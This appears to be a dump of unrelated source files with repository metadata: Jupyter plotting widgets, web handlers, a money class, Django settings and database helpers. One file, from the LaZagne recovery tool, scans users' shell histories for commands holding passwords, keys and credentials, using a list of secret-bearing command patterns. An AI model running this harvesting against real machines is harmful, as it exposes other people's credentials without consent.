if selection is not None:
selection = selection.copy()
model = vaex.jupyter.model.DataArray(df=self.df, axes=axes, selection=selection, **kwargs)
if shared:
grid = self.grid
else:
grid = vaex.jupyter.model.GridCalculator(self.df, [])
grid.model_add(model)
view = vaex.jupyter.view.DataArray(model=model, display_function=display_function)
return view
def axis_model(self, expression, limits=None):
return self._axes([expression], limits=[limits])[0]
def _axes(self, expressions, limits):
limits = self.df.limits(expressions, limits)
axes = [vaex.jupyter.model.Axis(df=self.df, expression=expression, min=min, max=max) for expression, (min, max) in zip(expressions, limits)]
return axes
def histogram(self, x, limits=None, selection=None, selection_interact='default', toolbar=True, shared=False, **kwargs):
import vaex.jupyter.model
import vaex.jupyter.view
if selection is not None:
selection = selection.copy()
x, = self._axes([x], limits)
model = vaex.jupyter.model.Histogram(df=self.df, x=x, selection=selection, selection_interact=selection_interact, **kwargs)
if shared:
grid = self.grid
else:
grid = vaex.jupyter.model.GridCalculator(self.df, [])
grid.model_add(model)
viz = vaex.jupyter.view.Histogram(model=model)
if toolbar:
viz.toolbar = _add_toolbar(viz)
return viz
def pie(self, x, limits=None, shared=False, **kwargs):
import vaex.jupyter.model
import vaex.jupyter.view
x, = self._axes([x], limits)
model = vaex.jupyter.model.Histogram(df=self.df, x=x, **kwargs)
if shared:
grid = self.grid
else:
grid = vaex.jupyter.model.GridCalculator(self.df, [])
grid.model_add(model)
viz = vaex.jupyter.view.PieChart(model=model)
return viz
def heatmap(self, x, y, limits=None, selection=None, selection_interact='default', transform='log', toolbar=True, shape=256, shared=False, **kwargs):
import vaex.jupyter.model
import vaex.jupyter.view
x, y = self._axes([x, y], limits)
if selection is not None:
selection = selection.copy()
model = vaex.jupyter.model.Heatmap(df=self.df, x=x, y=y, selection=selection, shape=shape, **kwargs)
if shared:
grid = self.grid
else:
grid = vaex.jupyter.model.GridCalculator(self.df, [])
self._last_grid = grid
grid.model_add(model)
viz = vaex.jupyter.view.Heatmap(model=model, transform=transform)
if toolbar:
viz.toolbar = _add_toolbar(viz)
return viz
def expression(self, value=None, label='Custom expression'):
'''Create a widget to edit a vaex expression.
        If value is an :class:`vaex.jupyter.model.Axis` object, its expression will be (bi-directionally) linked to the widget.
:param value: Valid expression (string or Expression object), or Axis
'''
from .widgets import ExpressionTextArea
import vaex.jupyter.model
if isinstance(value, vaex.jupyter.model.Axis):
expression_value = str(value.expression)
else:
expression_value = str(value) if value is not None else None
expression_widget = ExpressionTextArea(df=self.df, v_model=expression_value, label=label)
if isinstance(value, vaex.jupyter.model.Axis):
import traitlets
traitlets.link((value, 'expression'), (expression_widget, 'value'))
return expression_widget
def column(self, value=None, label='Choose a column'):
from .widgets import ColumnPicker
if isinstance(value, vaex.jupyter.model.Axis):
expression_value = str(value.expression)
else:
expression_value = str(value) if value is not None else None
column_widget = ColumnPicker(df=self.df, value=expression_value, label=label)
if isinstance(value, vaex.jupyter.model.Axis):
import traitlets
traitlets.link((value, 'expression'), (column_widget, 'value'))
return column_widget
def selection_expression(self, initial_value=None, name='default'):
from .widgets import ExpressionSelectionTextArea
if initial_value is None:
if not self.df.has_selection(name):
raise ValueError(f'No selection with name {name!r}')
else:
initial_value = self.df.get_selection(name).boolean_expression
return ExpressionSelectionTextArea(df=self.df, selection_name=name, v_model=str(initial_value) if initial_value is not None else None)
def progress_circular(self, width=10, size=70, color='#82B1FF', text='', auto_hide=False):
from .widgets import ProgressCircularNoAnimation
progress_circular = ProgressCircularNoAnimation(width=width, size=size, color=color, text=text, value=0)
@self.df.executor.signal_begin.connect
def progress_begin():
if auto_hide:
progress_circular.hidden = False
@self.df.executor.signal_progress.connect
def update_progress(value):
progress_circular.value = value*100
return True
@self.df.executor.signal_end.connect
def progress_update():
if auto_hide:
progress_circular.hidden = True
return progress_circular
def counter_processed(self, postfix="rows processed", update_interval=0.2):
from .widgets import Counter
counter_processed = Counter(value=0, postfix=postfix)
last_time = 0
@self.df.executor.signal_begin.connect
def progress_begin():
nonlocal last_time
last_time = time.time()
@self.df.executor.signal_progress.connect
def update_progress(value):
nonlocal last_time
number = int(value * len(self.df))
current_time = time.time()
if (current_time - last_time) > update_interval or value in [0, 1]:
counter_processed.value = number
last_time = current_time
return True
return counter_processed
def counter_selection(self, selection, postfix="rows selected", update_interval=0.2, lazy=False):
from .widgets import Counter
selected = self.df.count(selection=selection).item() if self.df.has_selection(name=selection) else 0
counter_selected = Counter(value=selected, postfix=postfix)
dirty = False
@self.df.signal_selection_changed.connect
def selection_changed(df, name):
nonlocal dirty
if name == selection:
# we only need to run once
if not dirty:
dirty = True
def update_value(value):
nonlocal dirty
dirty = False
try:
value = value.item()
except: # noqa
pass
counter_selected.value = value
# if lazy is True, this will only schedule the calculation, not yet execute it
if lazy:
vaex.delayed(update_value)(self.df.count(selection=selection, delay=True))
else:
update_value(self.df.count(selection=selection))
return counter_selected
# from .widgets import Tools
# from traitlets import link
# viz = [] if viz is None else viz
# viz = [viz] if not isinstance(viz, (tuple, list)) else viz
# tools = Tools(value=initial_value, children=[k.widget for k in viz])
# for v in viz:
# link((tools, 'value'), (v, 'tool'))
# return tools
# def card(plot, title=None, subtitle=None, **kwargs):
# from .widget import Card
# return Card(main=plot, title=title, subtitle,
def add_namespace():
pass
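# --- Editor-added usage sketch (not part of the original module) ---------------
# Typical notebook usage of the widget accessor defined above; the accessor name
# and example dataset are illustrative and assume vaex-jupyter is installed:
#
#   import vaex
#   df = vaex.example()
#   df.widget.histogram('x')                      # interactive 1-D histogram
#   df.widget.heatmap('x', 'y', transform='log')  # interactive 2-D heatmap
#   df.widget.progress_circular()                 # progress indicator widget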
| mit | 7,665,222,285,347,056,000 | 40.466135 | 153 | 0.613855 | false | 3.966463 | false | false | false |
AlexanderPease/email-waze | app/user.py | 1 | 2998 | import app.basic, settings, ui_methods
import simplejson as json
import logging
import tornado.web
from mongoengine.queryset import Q, DoesNotExist, MultipleObjectsReturned
from db.userdb import User
from db.groupdb import Group
from db.profiledb import Profile
from group_api import AcceptInvite
########################
### Settings page for a user
### /user/settings
########################
class UserSettings(app.basic.BaseHandler):
@tornado.web.authenticated
def get(self):
# Find user by email
try:
user = User.objects.get(email=self.current_user)
except MultipleObjectsReturned:
raise tornado.web.HTTPError(500)
except DoesNotExist:
raise tornado.web.HTTPError(404)
# Display User's Groups
groups = user.get_groups()
group_invites_raw = Group.objects(Q(invited_emails=self.current_user) | Q(domain_setting__icontains=user.get_domain()))
group_invites = []
for g in group_invites_raw:
if g not in groups:
group_invites.append(g)
# User pays for groups larger than 5 people
paying_groups_raw = groups(admin=user)
paying_groups = []
for g in paying_groups_raw:
if len(g.users) > 5:
paying_groups.append(g)
# Possible message or error
msg = self.get_argument('msg', '')
err = self.get_argument('err', '')
return self.render('user/user_settings.html', user=user,
groups=groups,
group_invites=group_invites,
paying_groups=paying_groups,
msg=msg,
err=err,
list_to_comma_delimited_string=ui_methods.list_to_comma_delimited_string,
nav_select='settings',
nav_title='Settings for %s' % user.casual_name())
########################
### Welcome page for a new user
### /user/welcome
########################
class UserWelcome(app.basic.BaseHandler):
@tornado.web.authenticated
def get(self):
'''
user_welcome.html sends AJAX requests to group_api.py for user to
join groups he/she is invited to
'''
if self.user.welcomed and self.user.email not in settings.get('staff'):
return self.redirect('/')
else:
self.user.welcomed = True
self.user.save()
# Invited Groups. Display as joined, but join via AJAX by default
group_invites = self.user.groups_can_join()
group_invites = list(set(group_invites))
return self.render('user/user_welcome.html', # extends dashboard.html
user = self.user,
nav_title = True,
nav_select = 'dashboard',
groups = None,
group_invites = group_invites,
recent_contacts = None, # not enough time for this script to execute
today_reminders = None,
later_reminders = None) # new users never have any reminders
| gpl-3.0 | 7,409,164,365,114,897,000 | 31.586957 | 127 | 0.592728 | false | 3.965608 | false | false | false |
City-of-Bloomington/green-rental | scripts/migrate_data.py | 2 | 1731 | """
this is a script to help tranfer a data format
that was used initially to store downloaded geocoded coordinates
to the current one...
not a database migration script
note added *2014.03.01 20:07:37 ... script is older than that
"""
import os, json, codecs, re
from helpers import save_json, load_json, Location, Geo, save_results
def update_json(source, city_tag):
cache_file = "%s.json" % city_tag
cache_destination = os.path.join(os.path.dirname(source), cache_file)
local_cache = load_json(cache_destination, create=True)
assert local_cache.has_key('buildings')
assert local_cache.has_key('parcels')
locations = {}
for key, value in local_cache['buildings'].items():
location = Location(value)
        # use a distinct name so we do not shadow update_json's `source` argument
        for source_key in location.sources:
            if hasattr(location, source_key):
                result = getattr(location, source_key)
                #convert from old dict format here
                if isinstance(result, dict):
                    print "Found dictionary in: %s for: %s" % (source_key, location.address)
                    result = [ result ]
                setattr(location, source_key, result)
locations[key] = location
#back it up for later
#enable this when downloading GPS coordinates...
#the rest of the time it slows things down
local_cache['buildings'] = {}
for key, value in locations.items():
local_cache['buildings'][key] = value.to_dict()
save_json(cache_destination, local_cache)
if __name__ == '__main__':
#main()
#update_json('/c/clients/green_rentals/cities/bloomington/data/Bloomington_rental.csv')
update_json('/c/clients/green_rentals/cities/ann_arbor/data/ann_arbor.json', "ann_arbor")
| agpl-3.0 | -8,462,015,992,887,935,000 | 33.62 | 93 | 0.642981 | false | 3.829646 | false | false | false |
darrencheng0817/AlgorithmLearning | Python/interview/levelSum.py | 1 | 1076 | '''
Created on 2015-12-04
Given a nested list such as [1, [2,3], [[4]]], return a weighted sum. In the basic
version the weight grows by 1 for every level of nesting (top level has weight 1),
so the example gives sum = 1*1 + (2+3)*2 + 4*3.
Follow-up (the variant implemented below): the weight shrinks by 1 per level, so the
deepest level has weight 1, giving sum = 3*1 + (2+3)*2 + 4*1.
@author: Darren
'''
def levelSum(string):
if not string:
return 0
index=0
level=0
maxLevel=0
d={}
while index<len(string):
char= string[index]
if char=="[":
level+=1
maxLevel=max(maxLevel,level)
index+=1
elif char.isdigit():
startIndex=index
while string[index].isdigit():
index+=1
num=int(string[startIndex:index])
if level not in d:
d[level]=[]
d[level].append(num)
elif char=="]":
level-=1
index+=1
else:
index+=1
res=0
for key,value in d.items():
for num in value:
res+=(maxLevel-key+1)*num
return res
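# Worked example for the reverse weighting implemented above:
# "[1, [2,3], [[4]]]" gives maxLevel = 3 and d = {1: [1], 2: [2, 3], 3: [4]},
# so levelSum(...) = 3*1 + 2*(2+3) + 1*4 = 17.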
print(levelSum("[1, [2,3], [2,3],[[4]]]") ) | mit | 2,215,303,086,633,905,700 | 23.707317 | 98 | 0.474308 | false | 3.057402 | false | false | false |
mwx1993/TACTIC | src/tactic/ui/checkin/sandbox_select_wdg.py | 6 | 6093 | ###########################################################
#
# Copyright (c) 2014, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ['SandboxSelectWdg']
from pyasm.common import Environment, jsonloads, jsondumps, Config
from pyasm.biz import Project
from pyasm.web import DivWdg, Table, WidgetSettings
from tactic.ui.common import BaseRefreshWdg
from pyasm.widget import IconWdg, RadioWdg
from tactic.ui.widget import IconButtonWdg
from pyasm.search import Search, SearchType
class SandboxSelectWdg(BaseRefreshWdg):
def get_display(my):
top = my.top
top.add_class("spt_sandbox_select_top")
sandbox_options = [
{
'name': 'fast',
'base_dir': 'C:/Fast',
},
{
'name': 'faster',
'base_dir': 'C:/Faster',
},
{
'name': 'slow',
'base_dir': 'Z:/Slow',
}
]
process = my.kwargs.get("process")
search_key = my.kwargs.get("search_key")
sobject = Search.get_by_search_key(search_key)
search_type = sobject.get_base_search_type()
client_os = Environment.get_env_object().get_client_os()
if client_os == 'nt':
prefix = "win32"
else:
prefix = "linux"
alias_dict = Config.get_dict_value("checkin", "%s_sandbox_dir" % prefix)
search_key = sobject.get_search_key()
key = "sandbox_dir:%s" % search_key
from pyasm.web import WidgetSettings
value = WidgetSettings.get_value_by_key(key)
sandboxes_div = DivWdg()
top.add(sandboxes_div)
sandboxes_div.add_relay_behavior( {
'type': 'mouseenter',
'bvr_match_class': 'spt_sandbox_option',
'cbjs_action': '''
var last_background = bvr.src_el.getStyle("background-color");
bvr.src_el.setAttribute("spt_last_background", last_background);
bvr.src_el.setStyle("background-color", "#E0E0E0");
bvr.src_el.setStyle("opacity", "1.0");
'''
} )
sandboxes_div.add_relay_behavior( {
'type': 'mouseleave',
'bvr_match_class': 'spt_sandbox_option',
'cbjs_action': '''
var last_background = bvr.src_el.getAttribute("spt_last_background");
bvr.src_el.setStyle("background-color", last_background);
if (!bvr.src_el.hasClass("spt_selected")) {
bvr.src_el.setStyle("opacity", "0.5");
}
'''
} )
sandboxes_div.add_relay_behavior( {
'type': 'mouseup',
'key': key,
'bvr_match_class': 'spt_sandbox_option',
'cbjs_action': '''
var sandbox_dir = bvr.src_el.getAttribute("spt_sandbox_dir");
var server = TacticServerStub.get();
server.set_widget_setting(bvr.key, sandbox_dir);
var applet = spt.Applet.get();
applet.makedirs(sandbox_dir);
//var top = bvr.src_el.getParent(".spt_sandbox_select_top");
var top = bvr.src_el.getParent(".spt_checkin_top");
spt.panel.refresh(top);
'''
} )
#search = Search("config/naming")
#search.add_filter("search_type", search_type)
#search.add_filter("process", process)
#namings = search.get_sobjects()
#naming = namings[0]
from pyasm.biz import Snapshot, Naming
virtual_snapshot = Snapshot.create_new()
virtual_snapshot.set_value("process", process)
# for purposes of the sandbox folder for the checkin widget,
# the context is the process
virtual_snapshot.set_value("context", process)
naming = Naming.get(sobject, virtual_snapshot)
if naming:
naming_expr = naming.get_value("sandbox_dir_naming")
alias_options = naming.get_value("sandbox_dir_alias")
else:
naming_expr = None
alias_options = None
if alias_options == "__all__":
alias_options = alias_dict.keys()
elif alias_options:
alias_options = alias_options.split("|")
else:
alias_options = ['default']
for alias in alias_options:
from pyasm.biz import DirNaming
dir_naming = DirNaming(sobject=sobject, snapshot=virtual_snapshot)
dir_naming.set_protocol("sandbox")
dir_naming.set_naming(naming_expr)
base_dir = dir_naming.get_dir(alias=alias)
sandbox_div = DivWdg()
sandboxes_div.add(sandbox_div)
sandbox_div.add_class("spt_sandbox_option")
sandbox_div.add_attr("spt_sandbox_dir", base_dir)
if value == base_dir:
sandbox_div.add_color("background", "background3")
#sandbox_div.set_box_shadow()
sandbox_div.add_class("spt_selected")
else:
sandbox_div.add_style("opacity", "0.5")
sandbox_div.add_style("width: auto")
sandbox_div.add_style("height: 55px")
sandbox_div.add_style("padding: 5px")
#sandbox_div.add_style("float: left")
sandbox_div.add_style("margin: 15px")
sandbox_div.add_border()
if alias:
alias_div = DivWdg()
sandbox_div.add(alias_div)
alias_div.add(alias)
alias_div.add_style("font-size: 1.5em")
alias_div.add_style("font-weight: bold")
alias_div.add_style("margin-bottom: 15px")
icon_wdg = IconWdg("Folder", IconWdg.FOLDER)
sandbox_div.add(icon_wdg)
sandbox_div.add(base_dir)
return top
| epl-1.0 | 262,500,904,807,144,000 | 30.246154 | 81 | 0.541605 | false | 3.789179 | false | false | false |
AlessandroZ/LaZagne | Linux/lazagne/softwares/sysadmin/cli.py | 1 | 4072 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import psutil
import pwd
import os
from lazagne.config.module_info import ModuleInfo
from lazagne.config import homes
try:
from ConfigParser import ConfigParser # Python 2.7
except ImportError:
from configparser import ConfigParser # Python 3
class Cli(ModuleInfo):
def __init__(self):
ModuleInfo.__init__(self, 'cli', 'sysadmin')
def get_files(self):
known = set()
for user, histfile in homes.users(file=['.history', '.sh_history', '.bash_history', '.zhistory']):
yield user, histfile
known.add(histfile)
try:
for process in psutil.process_iter():
try:
environ = process.environ()
user = process.username()
except Exception:
continue
if 'HISTFILE' not in environ:
continue
histfile = environ['HISTFILE']
if histfile in ('/dev/zero', '/dev/null'):
continue
if histfile.startswith('~/'):
try:
home = pwd.getpwuid(process.uids().effective).pw_dir
except Exception:
continue
histfile = os.path.join(home, histfile[2:])
if os.path.isfile(histfile) and not histfile in known:
yield user, histfile
known.add(histfile)
except AttributeError:
# Fix AttributeError: 'module' object has no attribute 'process_iter'
pass
def get_lines(self):
known = set()
for user, plainfile in self.get_files():
try:
with open(plainfile) as infile:
for line in infile.readlines():
line = line.strip()
if line.startswith('#'):
continue
try:
int(line)
continue
except Exception:
pass
line = ' '.join(x for x in line.split() if x)
if line not in known:
yield user, line
known.add(line)
except Exception:
pass
for user, histfile in homes.users(file='.local/share/mc/history'):
parser = ConfigParser()
try:
parser.read(histfile)
except Exception:
continue
try:
for i in parser.options('cmdline'):
line = parser.get('cmdline', i)
if line not in known:
yield user, line
known.add(line)
except Exception:
pass
def suspicious(self, user, line):
markers = [
('sshpass', '-p'),
('chpasswd',),
('openssl', 'passwd'),
('sudo', '-S'),
('mysql', '-p'),
('psql', 'postgresql://'),
('pgcli', 'postgresql://'),
('ssh', '-i'),
('sqlplus', '/'),
('xfreerdp', '/p'),
('vncviewer', 'passwd'),
('vncviewer', 'PasswordFile'),
('mount.cifs', 'credentials'),
('pass=',),
('smbclient',),
('ftp', '@'),
('wget', '@'),
('curl', '@'),
('curl', '-u'),
('wget', '-password'),
('rdesktop', '-p'),
]
for marker in markers:
if all((x in line) for x in marker):
yield {
'User': user,
'Cmd': line
}
def run(self):
all_cmds = []
for user, line in self.get_lines():
for cmd in self.suspicious(user, line):
all_cmds.append(cmd)
return all_cmds
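# Minimal usage sketch (assumption: LaZagne's launcher normally discovers and runs
# modules itself; instantiating Cli directly like this is only for illustration):
#   creds = Cli().run()
#   for cred in creds:
#       print(cred['User'], cred['Cmd'])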
| lgpl-3.0 | -487,171,008,708,852,740 | 29.38806 | 106 | 0.4278 | false | 4.959805 | true | false | false |
suvitorg/suvit-odoo | suvit_base/tests/crud.py | 1 | 2195 | # -*- coding: utf-8 -*-
from lxml import etree
from odoo.tests.common import TransactionCase
from odoo.tools.safe_eval import safe_eval as eval
class CRUDCase(TransactionCase):
def crud(self, model, create_vals={}, write_vals={}, check_vals={}, view_id=None):
arch = model.fields_view_get(view_id=view_id, view_type='form', toolbar=True)
data = model.default_get(arch['fields'].keys())
self.assertTrue(arch['toolbar'])
obj = model.create(create_vals)
self.assertTrue(obj.exists())
obj = model.browse(obj.id)
self.assertTrue(obj)
data = obj.read(arch['fields'].keys())
arch = model.fields_view_get(view_type='tree')
data = obj.read(arch['fields'].keys())
obj.write(write_vals)
for k, v in write_vals.items():
if type(obj[k]) != type(v) and isinstance(v, int):
self.assertEqual(obj[k].id, v)
else:
self.assertEqual(obj[k], v)
for k, v in check_vals.items():
self.assertEqual(obj[k], v)
arch = model.fields_view_get(view_type='tree', toolbar=True)
self.assertTrue(arch['toolbar'])
arch = model.fields_view_get(view_type='search')
self.assertTrue(arch)
nodes = etree.XML(arch['arch']).xpath("/search/group/filter")
if not nodes:
nodes = etree.XML(arch['arch']).xpath("/search/filter")
groups = []
fields = []
for node in nodes:
node = eval(node.get('context'))
if 'group_by' not in node:
continue
node = node.get('group_by').decode('utf-8', 'ignore')
groups.append(node)
fields.append(node.split(":")[0])
fields = list(set(fields))
if groups:
field_names = self.env['ir.model.fields'].search([
('model', '=', model._name), ('name', 'in', fields)]).mapped('name')
self.assertEqual(len(fields), len(field_names))
res = model.read_group(domain=[], fields=fields, groupby=groups, lazy=True)
self.assertTrue(res)
obj.unlink()
self.assertFalse(obj.exists())
| agpl-3.0 | 5,289,709,077,205,224,000 | 33.296875 | 87 | 0.562187 | false | 3.752137 | false | false | false |
anler/Rockefeller | rockefeller/money.py | 1 | 5943 | # -*- coding: utf-8 -*-
from __future__ import division
import decimal
from collections import namedtuple
from six import PY3
from .exchange_rates import get_exchange_rate
from .exceptions import ExchangeError, MoneyError
def round_amount(amount, currency):
"""Round a given amount using curreny's exponent.
:param amount: :class:`~decimal.Decimal` number.
:param currency: :class:`~rockefeller.currency.Currency` object.
:return: Rounded amount as a :class:`~decimal.Decimal` number.
:raises: :class:`~rockefeller.exceptions.MoneyError` if an invalid currency
is supplied.
"""
try:
exponent = currency.exponent
except AttributeError:
raise MoneyError('Wrong currency `{!r}` for money.'.format(currency))
    exponent = '1.' + '0' * exponent
return amount.quantize(decimal.Decimal(exponent), rounding=decimal.ROUND_HALF_UP)
def to_decimal(value):
"""Convert a value into a decimal value.
:param value: Any value that can be casted into a numeric string.
:return: Decimal value. :class:`~decimal.Decimal` instance.
"""
if not isinstance(value, decimal.Decimal):
value = decimal.Decimal(str(value))
return value
def _check_operand(operation, operand):
if not isinstance(operand, Money):
msg = "unsupported operand type(s) for %s: 'Money' and '%r'" % (
operation, operand.__class__)
raise TypeError(msg)
class Money(namedtuple('Money', 'amount currency')):
"""Representation of money.
Every `Money` objects has an amount and a currency associated to it and the amount is always a
:class:`~decimal.Decimal` value.
Initialization params:
`amount`
Amount of money.
`currency`
Money currency. :class:`~rockefeller.currency.Currency` instance.
"""
indirection_currency = None
def __new__(cls, amount, currency):
return super(Money, cls).__new__(cls, to_decimal(amount), currency)
def __eq__(self, other):
return (isinstance(other, self.__class__) and
self.amount == other.amount and self.currency == other.currency)
def __add__(self, other):
_check_operand('+', other)
return Money(self.amount + other.amount, self.currency)
def __sub__(self, other):
_check_operand('-', other)
return Money(self.amount - other.amount, self.currency)
def __mul__(self, other):
_check_operand('*', other)
return Money(self.amount * other.amount, self.currency)
def __div__(self, other):
_check_operand('/', other)
return Money(self.amount / other.amount, self.currency)
__floordiv__ = __div__
__truediv__ = __div__
def __divmod__(self, other):
quotient, remainder = divmod(self.amount, other.amount)
return Money(quotient, self.currency), Money(remainder, self.currency)
def __float__(self):
return float(round_amount(self.amount, self.currency))
def __str__(self):
value = self.__unicode__()
if PY3:
return value
return value.encode('utf-8')
def __unicode__(self):
amount = self.amount
parts = str(amount).split('.')
if len(parts) == 2 and int(parts[1]) == 0:
amount = parts[0]
return u'{}{}'.format(self.currency.symbol, amount)
def remove(self, other):
result = self - other
if result.amount < 0:
result = Money(0, self.currency)
return result
def get_exchange_rate_to(self, currency, indirection_currency=None):
"""Get exchange rate of the currency of this money relatively to
``currency``.
:param currency: Output currency.
:class:`~rockefeller.currency.Currency` instance.
:param indirection_currency: Use this currency as the indirection
currency. :class:`~rockefeller.currency.Currency` instance.
:return: Exchange rate as a ``decimal`` if found, else ``None``.
"""
rate = get_exchange_rate(self.currency, currency)
if rate is None:
if not indirection_currency and Money.indirection_currency:
indirection_currency = Money.indirection_currency
rate_from_base = get_exchange_rate(self.currency, indirection_currency)
rate_base_to = get_exchange_rate(indirection_currency, currency)
if rate_from_base and rate_base_to:
rate = rate_from_base * rate_base_to
return rate
@property
def rounded_amount(self):
return round_amount(self.amount, self.currency)
def exchange_to(self, currency, indirection_currency=None,
exchange_rate=None):
"""Convert this money into money of another currency.
:param currency: Convert this money into this currency.
:class:`~rockefeller.currency.Currency` instance.
:param indirection_currency: Use this currency as the indirection
currency. :class:`~rockefeller.currency.Currency` instance.
:param exchange_rate: Use this exchange rate instead of trying to find
one.
:return: Money in ``currency`` currency.
:class:`~rockefeller.money.Money` instance.
:raises: :class:`~rockefeller.exceptions.ExchangeError`
            if the exchange rate between the currencies is not defined.
"""
if exchange_rate is None:
exchange_rate = self.get_exchange_rate_to(
currency, indirection_currency=indirection_currency)
else:
exchange_rate = to_decimal(exchange_rate)
if exchange_rate is None:
raise ExchangeError('Exchange rate {}-{} not defined.'.format(
self.currency, currency))
amount = round_amount(self.amount * exchange_rate, currency)
return self.__class__(amount=amount, currency=currency)
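# Usage sketch (illustrative only; ``usd`` and ``eur`` stand for
# rockefeller.currency.Currency objects obtained elsewhere, and an exchange rate
# between them is assumed to have been registered in the exchange_rates module):
#   price = Money(10, usd) + Money('2.50', usd)   # amounts are stored as Decimal
#   float(price)                                  # rounded using the currency exponent
#   price.exchange_to(eur)                        # Money in eur, or ExchangeError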
| mit | 7,846,369,725,114,093,000 | 33.754386 | 98 | 0.628639 | false | 4.135699 | false | false | false |
BunsenMcDubbs/cs4400-project | add_projects.py | 1 | 1707 | from random import randint, sample, choice
from app.models import Category, Designation, Project, Requirement
def add_projects(num_projects=20):
designations = [d['name'] for d in Designation.get_all()]
categories = [c['name'] for c in Category.get_all()]
year = [y['requirement_name'] for y in Requirement.get_all_year(include_none=True)]
major = [m['requirement_name'] for m in Requirement.get_all_major(include_none=True)]
department = [d['requirement_name'] for d in Requirement.get_all_department(include_none=True)]
for i in xrange(num_projects):
name = 'Project #{}'.format(i)
description = 'Description for {}'.format(name)
advisor_name = 'Advisor for {}'.format(name)
advisor_email = 'project{}[email protected]'.format(i)
est_num_students = randint(0, 1000)
designation = designations[randint(0, len(designations) - 1)]
        # use a separate name inside the comprehension (Python 2 leaks it into this scope)
        cats = [categories[j] for j in sample(xrange(len(categories)), randint(2, 5))]
reqs = []
if choice([True, False]):
reqs.append(year[randint(0, len(year) - 1)])
if choice([True, False]):
reqs.append(major[randint(0, len(major) - 1)])
else:
            # presumably intended to draw from the department list here
            reqs.append(department[randint(0, len(department) - 1)])
new_project = Project(
name=name,
description=description,
advisor_name=advisor_name,
advisor_email=advisor_email,
est_num_students=est_num_students,
designation_name=designation,
categories=cats,
requirements=reqs,
is_new_project=True
)
new_project.save()
if __name__=='__main__':
add_projects()
| mit | 3,880,460,114,864,280,000 | 40.634146 | 99 | 0.60867 | false | 3.718954 | false | false | false |
santumahapatra/django-poll-app | mysite/mysite/settings.py | 1 | 2040 | """
Django settings for mysite project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '=vo#pirs@)4p%&#nnek+gq0yr7f2la1f@a51*3u4=h4&py9fo_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'polls',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
| mit | 1,138,400,909,693,369,500 | 23 | 71 | 0.719118 | false | 3.202512 | false | false | false |
ytsapras/robonet_site | scripts/OBSOLETE_CODE/update_db.py | 1 | 48917 | ################################################################################################################
# Collection of routines to update the RoboNet database tables
# Keywords match the class model fields in ../robonet_site/events/models.py
#
# Written by Yiannis Tsapras Sep 2015
# Last update:
################################################################################################################
# Import dependencies
import os
import sys
from local_conf import get_conf
robonet_site = get_conf('robonet_site')
sys.path.append(robonet_site)
#os.environ['DJANGO_SETTINGS_MODULE'] = 'robonet_site.settings'
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'robonet_site.settings')
from django.core import management
from django.conf import settings
from django.utils import timezone
from django import setup
setup()
#from events.models import Event, Single_Model, Binary_Model, Data_File, Robonet_Log, Robonet_Reduction, Robonet_Request, Robonet_Status, Ogle_Detail, Moa_Detail, Kmt_Detail
from events.models import Operator, Telescope, Instrument, Filter, Event, Event_Name
################################################################################################################
def add_operator(operator_name):
"""
Adds a new operator name in the database.
This can be the survey name or the name of the follow-up group.
Keyword arguments:
operator_name -- The operator name (string, required)
"""
    new_operator, created = Operator.objects.get_or_create(name=operator_name)
    successful = created
    return successful
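# Example: add_operator("OGLE") returns True the first time the operator is
# created and False on later calls (get_or_create reports created=False then).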
################################################################################################################
def add_telescope(operator, telescope_name, aperture=0.0, latitude=0.0, longitude=0.0, altitude=0.0, site=""):
"""
Adds a new telescope name in the database.
Keyword arguments:
operator -- The operator (object, required) -- ForeignKey object
telescope_name -- The telescope name (string, required)
aperture -- The telescope aperture (float, optional, default=0.0)
latitude -- The telescope latitude (N) in decimal degrees (float, optional, default=0.0)
longitude -- The telescope longitude (E) in decimal degrees (float, optional, default=0.0)
altitude -- The telescope altitude in meters (float, optional, default=0.0)
site -- The site name (string, optional, default="")
"""
known_telescope = Telescope.objects.filter(name=telescope_name).exists()
# If the telescope already exists there's no need to add it
if known_telescope == True:
successful = False
else:
add_new = Telescope(operator=operator, name=telescope_name, aperture=aperture, latitude=latitude,
longitude=longitude, altitude=altitude,site=site)
add_new.save()
successful = True
return successful
################################################################################################################
def add_instrument(telescope, instrument_name, pixscale=0.0):
"""
Adds a new instrument name in the database. A single instrument can appear multiple
times in this list as it can be moved to different telescopes.
Keyword arguments:
telescope -- The telescope (object, required) -- ForeignKey object
instrument_name -- The instrument name (string, required)
pixscale -- The pixel scale of the CCD (arcsec/pix)
"""
try:
add_new = Instrument(telescope=telescope, name=instrument_name, pixscale=pixscale)
add_new.save()
successful = True
except:
successful = False
return successful
################################################################################################################
